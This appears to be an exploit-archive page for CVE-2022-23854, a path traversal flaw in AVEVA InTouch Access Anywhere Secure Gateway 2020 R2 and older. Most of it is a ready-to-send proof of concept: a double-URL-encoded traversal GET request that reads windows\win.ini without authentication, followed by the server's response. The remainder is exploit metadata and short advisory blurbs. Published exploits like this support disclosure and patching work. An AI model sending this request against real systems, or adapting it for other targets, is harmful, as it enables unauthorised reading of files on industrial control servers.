Headline
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 suffers from a path traversal vulnerability.
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path TraversalExploit Author: Jens Regel (CRISEC IT-Security)Date: 11/11/2022CVE: CVE-2022-23854Version: Access Anywhere Secure Gateway versions 2020 R2 and olderProof of Concept:GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1HTTP/1.1 200 OKServer: EricomSecureGateway/8.4.0.26844.*(..); for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1Related news
CVE-2022-23854
AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.
InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal
InTouch Access Anywhere Secure Gateway versions 2020 R2 and below suffer from a path traversal vulnerability.